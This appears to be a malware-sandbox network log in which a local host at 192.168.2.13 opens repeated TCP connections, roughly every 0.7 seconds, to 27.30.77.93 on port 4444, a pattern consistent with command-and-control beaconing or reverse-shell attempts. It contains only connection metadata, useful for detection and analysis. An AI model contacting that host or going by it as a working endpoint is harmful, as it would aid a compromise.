Oct 16, 2024 10:08:13.488110065 CEST	50822	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:13.493860960 CEST	4444	50822	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:14.163057089 CEST	4444	50822	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:14.166183949 CEST	50822	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:14.166775942 CEST	50822	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:14.168231010 CEST	50824	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:14.171629906 CEST	4444	50822	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:14.173140049 CEST	4444	50824	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:14.173229933 CEST	50824	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:14.175221920 CEST	50824	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:14.180098057 CEST	4444	50824	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:14.847760916 CEST	4444	50824	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:14.850122929 CEST	50824	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:14.850275040 CEST	50824	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:14.851125956 CEST	50826	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:14.855343103 CEST	4444	50824	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:14.856051922 CEST	4444	50826	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:14.856112957 CEST	50826	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:14.857976913 CEST	50826	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:14.863269091 CEST	4444	50826	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:15.540009022 CEST	4444	50826	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:15.542125940 CEST	50826	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:15.542987108 CEST	50826	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:15.544255018 CEST	50828	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:15.547914982 CEST	4444	50826	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:15.549218893 CEST	4444	50828	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:15.549340963 CEST	50828	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:15.552213907 CEST	50828	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:15.557064056 CEST	4444	50828	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:16.222110987 CEST	4444	50828	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:16.225922108 CEST	50828	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:16.226576090 CEST	50830	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:16.231283903 CEST	4444	50828	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:16.231942892 CEST	4444	50830	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:16.232080936 CEST	50830	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:16.233999968 CEST	50830	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:16.239073992 CEST	4444	50830	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:16.908865929 CEST	4444	50830	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:16.910125017 CEST	50830	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:16.911946058 CEST	50830	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:16.912892103 CEST	50832	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:16.916949987 CEST	4444	50830	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:16.917834044 CEST	4444	50832	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:16.917917013 CEST	50832	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:16.920995951 CEST	50832	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:16.926009893 CEST	4444	50832	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:17.599162102 CEST	4444	50832	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:17.601418972 CEST	50832	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:17.602262974 CEST	50834	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:17.606359959 CEST	4444	50832	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:17.607160091 CEST	4444	50834	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:17.607291937 CEST	50834	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:17.609246016 CEST	50834	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:17.614308119 CEST	4444	50834	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:18.271771908 CEST	4444	50834	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:18.274125099 CEST	50834	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:18.274516106 CEST	50834	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:18.275455952 CEST	50836	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:18.279467106 CEST	4444	50834	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:18.280452013 CEST	4444	50836	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:18.280544996 CEST	50836	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:18.282764912 CEST	50836	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:18.287811995 CEST	4444	50836	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:18.960653067 CEST	4444	50836	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:18.962100029 CEST	50836	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:18.963116884 CEST	50836	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:18.963907003 CEST	50838	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:18.968940020 CEST	4444	50836	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:18.969852924 CEST	4444	50838	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:18.969954014 CEST	50838	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:18.971877098 CEST	50838	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:18.976888895 CEST	4444	50838	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:19.659303904 CEST	4444	50838	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:19.662235975 CEST	50838	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:19.662983894 CEST	50838	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:19.663939953 CEST	50840	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:19.668046951 CEST	4444	50838	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:19.668988943 CEST	4444	50840	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:19.669083118 CEST	50840	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:19.671591997 CEST	50840	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:19.676470041 CEST	4444	50840	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:20.364162922 CEST	4444	50840	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:20.366250992 CEST	50840	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:20.368005991 CEST	50840	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:20.369127035 CEST	50842	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:20.373563051 CEST	4444	50840	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:20.374299049 CEST	4444	50842	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:20.374399900 CEST	50842	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:20.376115084 CEST	50842	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:20.381161928 CEST	4444	50842	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:21.075839996 CEST	4444	50842	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:21.077672005 CEST	50842	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:21.078314066 CEST	50844	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:21.082631111 CEST	4444	50842	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:21.083281994 CEST	4444	50844	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:21.083451033 CEST	50844	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:21.084428072 CEST	50844	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:21.089287996 CEST	4444	50844	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:21.769527912 CEST	4444	50844	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:21.770215034 CEST	50844	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:21.771831989 CEST	50844	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:21.772681952 CEST	50846	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:21.776787043 CEST	4444	50844	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:21.777698040 CEST	4444	50846	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:21.777789116 CEST	50846	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:21.779416084 CEST	50846	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:21.784584045 CEST	4444	50846	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:22.461184025 CEST	4444	50846	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:22.462131023 CEST	50846	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:22.463665009 CEST	50846	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:22.464611053 CEST	50848	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:22.468612909 CEST	4444	50846	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:22.469572067 CEST	4444	50848	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:22.469644070 CEST	50848	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:22.471421003 CEST	50848	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:22.476449013 CEST	4444	50848	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:23.146011114 CEST	4444	50848	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:23.148365974 CEST	50848	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:23.149224997 CEST	50850	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:23.153316021 CEST	4444	50848	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:23.154150963 CEST	4444	50850	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:23.154278994 CEST	50850	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:23.155617952 CEST	50850	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:23.160391092 CEST	4444	50850	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:23.838584900 CEST	4444	50850	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:23.840828896 CEST	50850	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:23.841645956 CEST	50852	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:23.845958948 CEST	4444	50850	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:23.846666098 CEST	4444	50852	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:23.846754074 CEST	50852	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:23.847834110 CEST	50852	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:23.852900028 CEST	4444	50852	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:24.548592091 CEST	4444	50852	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:24.550103903 CEST	50852	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:24.550781012 CEST	50852	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:24.551446915 CEST	50854	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:24.555588961 CEST	4444	50852	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:24.556396961 CEST	4444	50854	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:24.556520939 CEST	50854	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:24.557648897 CEST	50854	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:24.562452078 CEST	4444	50854	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:25.225053072 CEST	4444	50854	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:25.226147890 CEST	50854	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:25.227885962 CEST	50854	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:25.228863955 CEST	50856	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:25.232853889 CEST	4444	50854	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:25.233828068 CEST	4444	50856	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:25.233890057 CEST	50856	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:25.235491991 CEST	50856	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:25.240513086 CEST	4444	50856	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:25.905961037 CEST	4444	50856	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:25.909549952 CEST	50856	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:25.910649061 CEST	50858	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:25.914607048 CEST	4444	50856	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:25.915513992 CEST	4444	50858	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:25.915616035 CEST	50858	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:25.918498993 CEST	50858	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:25.923480034 CEST	4444	50858	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:26.639014006 CEST	4444	50858	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:26.641864061 CEST	50858	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:26.642545938 CEST	50860	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:26.646900892 CEST	4444	50858	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:26.647557974 CEST	4444	50860	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:26.647681952 CEST	50860	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:26.649516106 CEST	50860	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:26.654479027 CEST	4444	50860	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:27.333630085 CEST	4444	50860	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:27.334120989 CEST	50860	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:27.336854935 CEST	50860	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:27.337596893 CEST	50862	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:27.341919899 CEST	4444	50860	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:27.342483997 CEST	4444	50862	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:27.342541933 CEST	50862	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:27.344206095 CEST	50862	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:27.349206924 CEST	4444	50862	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:28.024269104 CEST	4444	50862	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:28.026112080 CEST	50862	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:28.027409077 CEST	50862	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:28.028708935 CEST	50864	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:28.032320976 CEST	4444	50862	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:28.033660889 CEST	4444	50864	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:28.033709049 CEST	50864	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:28.035341024 CEST	50864	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:28.040209055 CEST	4444	50864	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:28.709583998 CEST	4444	50864	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:28.710133076 CEST	50864	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:28.713109970 CEST	50864	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:28.714652061 CEST	50866	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:28.718044996 CEST	4444	50864	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:28.719562054 CEST	4444	50866	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:28.719662905 CEST	50866	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:28.722227097 CEST	50866	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:28.727130890 CEST	4444	50866	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:29.406235933 CEST	4444	50866	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:29.409526110 CEST	50866	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:29.410550117 CEST	50868	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:29.414546013 CEST	4444	50866	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:29.415574074 CEST	4444	50868	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:29.415684938 CEST	50868	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:29.417552948 CEST	50868	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:29.422533989 CEST	4444	50868	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:30.129054070 CEST	4444	50868	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:30.130091906 CEST	50868	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:30.131634951 CEST	50868	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:30.132491112 CEST	50870	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:30.136722088 CEST	4444	50868	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:30.137372017 CEST	4444	50870	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:30.137567043 CEST	50870	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:30.139101982 CEST	50870	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:30.144047022 CEST	4444	50870	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:30.828881979 CEST	4444	50870	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:30.830104113 CEST	50870	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:30.831352949 CEST	50870	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:30.832036018 CEST	50872	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:30.836455107 CEST	4444	50870	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:30.836935043 CEST	4444	50872	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:30.837047100 CEST	50872	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:30.839148045 CEST	50872	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:30.844280005 CEST	4444	50872	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:31.514277935 CEST	4444	50872	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:31.518110037 CEST	50872	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:31.518950939 CEST	50872	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:31.520174980 CEST	50874	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:31.524039984 CEST	4444	50872	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:31.525160074 CEST	4444	50874	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:31.525223017 CEST	50874	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:31.527225018 CEST	50874	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:31.532352924 CEST	4444	50874	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:32.203037977 CEST	4444	50874	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:32.206121922 CEST	50874	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:32.206569910 CEST	50874	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:32.207962990 CEST	50876	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:32.211596012 CEST	4444	50874	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:32.212939024 CEST	4444	50876	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:32.213032961 CEST	50876	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:32.215642929 CEST	50876	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:32.220690012 CEST	4444	50876	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:32.899516106 CEST	4444	50876	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:32.901576042 CEST	50876	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:32.902364016 CEST	50878	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:32.906544924 CEST	4444	50876	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:32.907397032 CEST	4444	50878	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:32.907466888 CEST	50878	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:32.908756018 CEST	50878	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:32.913786888 CEST	4444	50878	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:33.586519957 CEST	4444	50878	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:33.589589119 CEST	50878	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:33.590698957 CEST	50880	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:33.594558001 CEST	4444	50878	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:33.595721960 CEST	4444	50880	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:33.595788956 CEST	50880	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:33.598501921 CEST	50880	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:33.603411913 CEST	4444	50880	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:34.287434101 CEST	4444	50880	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:34.290082932 CEST	50880	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:34.290148020 CEST	50880	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:34.291127920 CEST	50882	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:34.295206070 CEST	4444	50880	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:34.295999050 CEST	4444	50882	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:34.296068907 CEST	50882	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:34.297909021 CEST	50882	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:34.302977085 CEST	4444	50882	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:34.963999033 CEST	4444	50882	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:34.966139078 CEST	50882	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:34.967350006 CEST	50882	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:34.968627930 CEST	50884	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:34.972482920 CEST	4444	50882	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:34.973670006 CEST	4444	50884	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:34.973748922 CEST	50884	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:34.976564884 CEST	50884	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:34.981580019 CEST	4444	50884	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:35.743415117 CEST	4444	50884	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:35.746126890 CEST	50884	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:35.747303009 CEST	50884	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:35.748662949 CEST	50886	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:35.752151966 CEST	4444	50884	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:35.753608942 CEST	4444	50886	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:35.753694057 CEST	50886	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:35.756490946 CEST	50886	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:35.761418104 CEST	4444	50886	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:36.430150986 CEST	4444	50886	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:36.432715893 CEST	50886	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:36.433732986 CEST	50888	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:36.437741041 CEST	4444	50886	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:36.438838005 CEST	4444	50888	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:36.438908100 CEST	50888	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:36.440761089 CEST	50888	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:36.445815086 CEST	4444	50888	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:37.112823009 CEST	4444	50888	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:37.114094973 CEST	50888	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:37.115566969 CEST	50888	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:37.116700888 CEST	50890	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:37.120800018 CEST	4444	50888	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:37.121826887 CEST	4444	50890	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:37.122025013 CEST	50890	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:37.124224901 CEST	50890	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:37.129267931 CEST	4444	50890	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:37.805890083 CEST	4444	50890	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:37.809935093 CEST	50890	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:37.811368942 CEST	50892	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:37.815160036 CEST	4444	50890	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:37.816392899 CEST	4444	50892	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:37.816524982 CEST	50892	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:37.819130898 CEST	50892	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:37.824055910 CEST	4444	50892	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:38.477137089 CEST	4444	50892	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:38.478148937 CEST	50892	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:38.480994940 CEST	50892	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:38.482470989 CEST	50894	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:38.486036062 CEST	4444	50892	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:38.487445116 CEST	4444	50894	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:38.487520933 CEST	50894	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:38.490456104 CEST	50894	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:38.495412111 CEST	4444	50894	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:39.173990965 CEST	4444	50894	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:39.176989079 CEST	50894	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:39.178301096 CEST	50896	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:39.187513113 CEST	4444	50894	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:39.187555075 CEST	4444	50896	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:39.187602997 CEST	50896	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:39.189632893 CEST	50896	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:39.194638968 CEST	4444	50896	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:39.873097897 CEST	4444	50896	27.30.77.93	192.168.2.13
Oct 16, 2024 10:08:39.874114990 CEST	50896	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:39.876642942 CEST	50896	4444	192.168.2.13	27.30.77.93
Oct 16, 2024 10:08:39.877974987 CEST	50898	4444	192.168.2.13	27.30.77.93
